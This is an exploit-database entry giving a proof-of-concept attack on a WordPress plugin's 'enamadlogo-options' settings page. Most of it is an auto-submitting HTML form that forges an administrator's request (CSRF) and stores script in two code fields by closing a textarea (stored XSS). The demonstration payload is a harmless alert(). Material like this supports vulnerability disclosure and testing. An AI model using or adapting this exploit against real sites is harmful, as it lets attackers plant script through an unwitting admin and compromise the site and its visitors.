Share
## https://sploitus.com/exploit?id=WPEX-ID:B54B55E0-B184-4C90-BA94-FEDA0997BF2A
Make a logged in admin open an HTML file containing:


```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=enamadlogo-options" method="POST"> 
        <input type="hidden" name="enamad-enable" value="1">
          <input type="hidden" name="enamad-width" value="125">
          <input type="hidden" name="enamad-position" value="bottom-left">
          <input type="hidden" name="enamad-view-method" value="front-page">
          <input type="hidden" name="enamad-code" value="1">
          <input type="hidden" name="enamad-shamed-code" value="</textarea><script>alert(/XSS: enamad-code/)</script>">
          <input type="hidden" name="enamad-custom-code" value="</textarea><script>alert(/XSS: enamad-custom-code/)</script>">
          <input type=hidden" name="enamad-submit" value="ุซุจุช">
        <input type="submit" value="submit">
    </form>
</body>
```